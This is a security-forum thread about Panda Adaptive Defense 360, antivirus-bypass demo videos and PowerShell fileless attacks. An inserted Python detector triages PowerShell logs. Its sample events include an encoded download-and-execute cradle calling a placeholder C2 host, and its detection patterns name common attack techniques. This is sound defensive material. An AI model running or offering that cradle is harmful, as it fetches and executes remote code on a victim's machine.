Q&A Adaptive Defence 360

Discussion in 'Panda' started by owk688, Mar 2, 2017.

  1. Umbra

    Umbra From Emsisoft
    Developer

    May 16, 2011
    17,162
    29,620
    Community manager
    Vietnam & France
    Windows 10
    Emsisoft
    #141 Umbra, Apr 7, 2017
    Last edited: Apr 7, 2017
    Yes, it is a home user forum; that doesn't mean we can't talk about some corporate products, but you will have few people interested, hence why we are on this thread.

    Do you see many threads about Sophos UTM, Symantec EP, Palo Alto, CrowdStrike, hardware firewalls, honeypots, IDS/IPS, etc.? No, so you get the picture.
    People come here to know about home user products, not endpoint ones, those they can buy or use for free; however, some members like us work or worked as corporate admins, so we are also interested in endpoint products, but 99% of the other members here aren't.

    And honestly, views mean nothing; my 2016 security setup thread had 63k views lol.
     
  2. Emmanuellws

    Emmanuellws Level 3

    Mar 11, 2017
    115
    264
    Malaysia
    Windows 7
    Panda
    Yes, thanks for explaining that to everyone here; questions were raised from your previous statement that this forum is for home products only :) 63k is a lot. Job well done. Are we gonna get anything from thousands of views... if yes... I need to do something about it... hahahah kidding man.
     
    Umbra likes this.
  3. Emmanuellws

    Emmanuellws Level 3

    Mar 11, 2017
    115
    264
    Malaysia
    Windows 7
    Panda
    Mr Umbra, since you are one of the moderators here... probably just as a suggestion... maybe you can open a new category for business and corporate users to post related questions; then you can actually pull in lots of business users, which is good for malwaretips.com as well. Business product vendors can use this place to promote their products as well... you know, like Barracuda... Sangfor... Fortinet, that stuff. Just a suggestion.
     
    Sunshine-boy likes this.
  4. Umbra

    Umbra From Emsisoft
    Developer

    May 16, 2011
    17,162
    29,620
    Community manager
    Vietnam & France
    Windows 10
    Emsisoft
    Not worth it; I can count fewer than 10 members who are seriously interested in corporate solutions. If people want to talk about corporate solutions, just open a classic thread, but I can already guess few will comment on them.

    I am the one here that mostly opens those threads lol.
     
    Emmanuellws likes this.
  5. Emmanuellws

    Emmanuellws Level 3

    Mar 11, 2017
    115
    264
    Malaysia
    Windows 7
    Panda
    #145 Emmanuellws, Apr 8, 2017
    Last edited: Apr 8, 2017
    Guys, check out the Black Cipher Security channel on YouTube, bypassing antivirus and next-gen AV using penetration testing tools such as Metasploit and other malware and exploit generators. Panda Adaptive Defense 360 is in progress as requested... Black Cipher Security: contact them directly to test your favorite security product. They can do all sorts of attacks, including fileless or memory-based attacks. Stay tuned for the Panda Adaptive Defense 360 video of it being bypassed.
     
    woodrowbone and Sunshine-boy like this.
  6. Amelith Nargothrond

    Mar 22, 2017
    586
    2,119
    Romania
    Windows 10
    Avira
    Wondering where the software vendor and thread creator @owk688 disappeared to... This thread has transformed into a Panda commercial.
     
  7. Emmanuellws

    Emmanuellws Level 3

    Mar 11, 2017
    115
    264
    Malaysia
    Windows 7
    Panda
    #147 Emmanuellws, Apr 8, 2017
    Last edited: Apr 8, 2017
    It's ok.
     
  8. Emmanuellws

    Emmanuellws Level 3

    Mar 11, 2017
    115
    264
    Malaysia
    Windows 7
    Panda

    Finally, after waiting... Black Cipher Security managed to bypass PAD360 and had to use the most sophisticated attack, PowerShell through memory/RAM, under hardening mode (medium protection), although I suspect they rigged the test by allowing the uploaded backdoored application to be "unblocked" in the cloud console. Still, they needed to use a combination of 3 tools, namely PowerShell Empire, Metasploit and Veil-Evasion... and they also bypassed all other AV / next-gen AV from Emsisoft, Symantec, Trend Micro, F-Secure, Webroot, Avast, Sophos including its Intercept X, McAfee... upcoming, they are trying more, including Cylance... In fact, the only technology that can prevent their attack is Carbon Black with their own so-called "Streaming Prevention" protection mechanism; apparently that is the product they will introduce to corporate companies or governments.

    So all PAD360 users, please use Lock mode, as Black Cipher said it blocked their backdoored application; hackers won't get far if they use this sophisticated attack. Apart from that, you are totally safe and secure under Lock mode. Oh, by the way, apart from the 12-minute bypass demo after their 6 days of testing and research... all other brands mentioned just now only took them between 5-7 minutes for a complete attack, and with only one tool, PowerShell Empire or just Metasploit.

    The PowerShell fileless attack is the real deal that all AVs need to look out for. It won't leave any traces, because it will not leave any files on the disk; it will not use any malware signature, as it uses existing Windows OS system apps like PowerShell and WMI to do hijacking, to steal data or to infect with ransomware through your PC RAM/memory. Stay safe everyone, no matter what your AV is, and ensure you have application whitelisting running with your AV so hackers cannot advance further. Set up logging of PowerShell activity. Get notifications, detect and take action.
    Last but not least, disable PowerShell if you don't use it, but disabling still won't prevent them from running their own PowerShell instances directly from their tool, as the .NET DLLs are still running on your computer.
     
    Sunshine-boy likes this.
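The post above recommends logging PowerShell activity and acting on it. As an added example (not code from the post, from Panda or from Black Cipher Security), the script below shows what that detection step can look like: it scans records shaped after Windows PowerShell Script Block Logging events (Event ID 4104, field `ScriptBlockText`) for well-known in-memory tradecraft indicators, decodes any `-EncodedCommand` payload (UTF-16LE base64) and rescans it, and raises an alert when a block trips more than one indicator. The indicator list, the threshold and the four event records are constructed for this example; the records are simplified dicts, not real event log exports.

```python
"""Triage PowerShell Script Block Logging (Event ID 4104) records for
fileless-attack indicators. Added example with constructed sample data."""
import base64
import re

# Constructed indicator list: regexes for common in-memory PowerShell tradecraft.
INDICATORS = {
    # -Enc / -EncodedCommand / -ec followed by a base64 blob (captured for decoding)
    "encoded_command": re.compile(r"-e(?:nc|ncodedcommand|c)?\s+([A-Za-z0-9+/=]{16,})", re.I),
    "download_cradle": re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|Net\.WebClient", re.I),
    "invoke_expression": re.compile(r"\b(?:IEX|Invoke-Expression)\b", re.I),
    "reflective_load": re.compile(r"Reflection\.Assembly\]::Load", re.I),
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "policy_bypass": re.compile(r"-e(?:xecutionpolicy|p)\s+bypass", re.I),
    # Forcing the v1/v2 engine sidesteps script block logging on newer hosts
    "engine_downgrade": re.compile(r"-v(?:ersion)?\s+[12]\b", re.I),
}


def decode_encoded_command(text):
    """Return the decoded UTF-16LE payload of each -EncodedCommand argument found in text."""
    decoded = []
    for match in INDICATORS["encoded_command"].finditer(text):
        try:
            raw = base64.b64decode(match.group(1), validate=True)
            decoded.append(raw.decode("utf-16le", errors="ignore"))
        except (ValueError, UnicodeDecodeError):
            continue  # not valid base64: leave the outer-text hit in place, nothing to rescan
    return decoded


def scan_script_block(text):
    """Return the sorted indicator names that fire on one script block, including
    indicators found only inside a decoded -EncodedCommand payload."""
    hits = {name for name, rx in INDICATORS.items() if rx.search(text)}
    for payload in decode_encoded_command(text):
        hits |= {name for name, rx in INDICATORS.items() if rx.search(payload)}
    return sorted(hits)


def triage(records, threshold=2):
    """Return an alert per record whose indicator count reaches the threshold.
    records: iterable of dicts with Computer, TimeCreated and ScriptBlockText keys."""
    alerts = []
    for rec in records:
        hits = scan_script_block(rec.get("ScriptBlockText", ""))
        if len(hits) >= threshold:
            alerts.append({"Computer": rec["Computer"],
                           "TimeCreated": rec["TimeCreated"],
                           "indicators": hits})
    return alerts


def _encode(ps_text):
    """Build a -EncodedCommand argument the way PowerShell expects it (UTF-16LE, base64)."""
    return base64.b64encode(ps_text.encode("utf-16le")).decode("ascii")


# Constructed sample events: one benign admin command and three suspicious blocks.
SAMPLE_EVENTS = [
    {"EventID": 4104, "TimeCreated": "2017-04-17T09:12:01Z", "Computer": "WS01",
     "ScriptBlockText": "Get-ChildItem C:\\Users\\alice\\Documents | Measure-Object"},
    {"EventID": 4104, "TimeCreated": "2017-04-17T09:14:33Z", "Computer": "WS01",
     "ScriptBlockText": "powershell.exe -NoP -W Hidden -Enc " + _encode(
         "IEX (New-Object Net.WebClient).DownloadString('http://c2.example.invalid/stage')")},
    {"EventID": 4104, "TimeCreated": "2017-04-17T09:15:02Z", "Computer": "SRV02",
     "ScriptBlockText": "powershell -Version 2 -ExecutionPolicy Bypass -File C:\\temp\\update.ps1"},
    {"EventID": 4104, "TimeCreated": "2017-04-17T09:16:40Z", "Computer": "WS03",
     "ScriptBlockText": "[System.Reflection.Assembly]::Load($bytes) | Out-Null"},
]

if __name__ == "__main__":
    for alert in triage(SAMPLE_EVENTS):
        print(f"{alert['TimeCreated']} {alert['Computer']}: {', '.join(alert['indicators'])}")
```

Two design points matter in practice. First, an encoded command is opaque to plain string matching, so the decode-and-rescan step is what turns a single "encoded" hit into a high-confidence alert (the WS01 block above fires four indicators only after decoding). Second, the single-indicator WS03 record stays below the threshold on purpose: reflective assembly loads also occur in legitimate tooling, and a threshold of one would bury the analyst in noise; tune the threshold and the list against your own baseline.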
  9. Emmanuellws

    Emmanuellws Level 3

    Mar 11, 2017
    115
    264
    Malaysia
    Windows 7
    Panda
    #149 Emmanuellws, Apr 17, 2017
    Last edited: Apr 17, 2017
    And the final summary is: Panda Adaptive Defense 360 Workstation Policy is the best security configuration. Confirmed that they used the "Server Policy", which allows PowerShell to execute, and a Windows 7 VM running PowerShell 1.0/2.0 makes it easier (see the video's comment section). No wonder it took them 6 days to publish a 12-minute bypass demo video after my request was made, the longest among all bypassed products so far, because there is no way and not much for them to customize the policy on the endpoint. So PAD360 users, don't worry, you are protected 100% no matter what PowerShell attack on the "Advanced Protection Workstation Policy". For policies used on servers, it is recommended to run at minimum Windows Server 2016 to reduce the attack vector. If your servers are running Windows Server 2016 with PAD360 Server Policy, and your endpoints are on PAD360 Workstation Policy, you are secured. All malware attacks start from endpoints and then go to servers, since endpoints are the ones that download and execute email attachments. Black Cipher Security did a good job of pointing out a weakness in the Server Policy, since they could not exploit the Workstation Policy. I, as a PAD360 user, accept the weakness, but it won't happen because we don't use servers to download email and open attachments directly. All in all... PAD360 is a good choice for enterprise endpoint security. Hmm... now I am off to check on LogRhythm or CyberShark features for visibility on network attacks and integrity. Chiaooo!
     
    Sunshine-boy likes this.
  10. jamescv7

    jamescv7 Level 61
    Trusted

    Mar 15, 2011
    12,664
    17,722
    Web and FileMaker Developer
    Philippines
    Windows 10
    Microsoft
    Yes, you are correct; a reason why it should properly integrate the anti-exe concept or whitelisting technology, since the purpose is to monitor the current programs, which may show different behavior, so that the user can check and analyze the information.

    Fileless attacks have already been noted by some AVs; however, the information must be prioritized by research.
     
  11. Umbra

    Umbra From Emsisoft
    Developer

    May 16, 2011
    17,162
    29,620
    Community manager
    Vietnam & France
    Windows 10
    Emsisoft
    If a software can't protect the memory, it is of no use to me.
     
    TerrakionSmash and Emmanuellws like this.
  12. Emmanuellws

    Emmanuellws Level 3

    Mar 11, 2017
    115
    264
    Malaysia
    Windows 7
    Panda
    Well, I agree on this statement.
     
    Sunshine-boy and Umbra like this.
  13. Emmanuellws

    Emmanuellws Level 3

    Mar 11, 2017
    115
    264
    Malaysia
    Windows 7
    Panda
    Finally, BCS admitted they unblocked the backdoored putty.exe manually, which allowed the attack to be leveraged to another level and allowed a full takeover. [attached screenshot: upload_2017-4-21_8-44-34.png]
    My explanation to them is: well, it stopped that exe, yes, because it is unknown... if the original putty.exe was untouched it would have been allowed, but if anyone modifies the integrity of a file, it will be unknown, and soon it will be flagged as malware after completed analysis finds out it creates an unwanted connection right after launching. That's the feature of PAD360: it should block all zero-day or unclassified programs, which will greatly reduce new attacks. They said it will cause some productivity issues; I said hell no, because they easily unblocked it and allowed their attack to progress further. By now, the backdoored putty.exe is already flagged as malware.

    For all other AV products that they bypassed, I believe they did some unblocking too and allowed their attack to run, which we viewers didn't see and which they admitted in this video.
     
    TerrakionSmash likes this.
  14. Umbra

    Umbra From Emsisoft
    Developer

    May 16, 2011
    17,162
    29,620
    Community manager
    Vietnam & France
    Windows 10
    Emsisoft
    @Emmanuellws they are a Cylance reseller, and Cylance used to do "arranged" videos, as they did in their demonstration "tours"; so no surprises to me...
     
    Emmanuellws likes this.
  15. Emmanuellws

    Emmanuellws Level 3

    Mar 11, 2017
    115
    264
    Malaysia
    Windows 7
    Panda
    [attached screenshot: upload_2017-4-21_13-21-35.png]

    Yes, Cylance and Carbon Black Defense. Well, even if it is unfair, I managed to get them to admit that they rigged the test, so there is an explanation behind all the other AV products that they bypassed as well. So, don't worry, love and trust your own AV or security product, master it, and check your configuration. Oh well, at least they proved that if we misconfigured or reduced the security of a product, we sure get the attack to work flawlessly.
     
  16. Umbra

    Umbra From Emsisoft
    Developer

    May 16, 2011
    17,162
    29,620
    Community manager
    Vietnam & France
    Windows 10
    Emsisoft
    I don't need rigged tests to know that :D
     
  17. Emmanuellws

    Emmanuellws Level 3

    Mar 11, 2017
    115
    264
    Malaysia
    Windows 7
    Panda
    Well, not everyone is as good as you... so this serves as a reminder to others, including myself. hehehe
     
    Umbra and Sunshine-boy like this.
  18. Umbra

    Umbra From Emsisoft
    Developer

    May 16, 2011
    17,162
    29,620
    Community manager
    Vietnam & France
    Windows 10
    Emsisoft
    What I don't like is the way they hide important information during the video.
    - In Panda they unblocked a file;
    - in the ERP video they don't show the vulnerable processes;
    - in Comodo, they put paranoid mode but enabled safe mode and allowed trusted processes;

    and when I asked them to show all settings next time, they didn't reply. That is shady...
     
    Sunshine-boy and Emmanuellws like this.
  19. Emmanuellws

    Emmanuellws Level 3

    Mar 11, 2017
    115
    264
    Malaysia
    Windows 7
    Panda
    I agree with you, buddy. In the end, it's all for their marketing purposes, because it was not done by a real hacker or security hobbyist who does not earn profits. If the bypass demo videos were done fairly, without tuning down the product's true capability, it would have been a different story. Let's sum up their videos this way: they failed to show the weaknesses of those bypassed AV/security products; instead, they showed their own weaknesses, by cheating.
     
    shmu26, Sunshine-boy and Umbra like this.
  20. Emmanuellws

    Emmanuellws Level 3

    Mar 11, 2017
    115
    264
    Malaysia
    Windows 7
    Panda
    @Umbra, finally, Black Cipher Security plays it fair, but they turned OFF some protections: Application Control, PowerShell and Active Scripts Protection.
     
    Sunshine-boy and Umbra like this.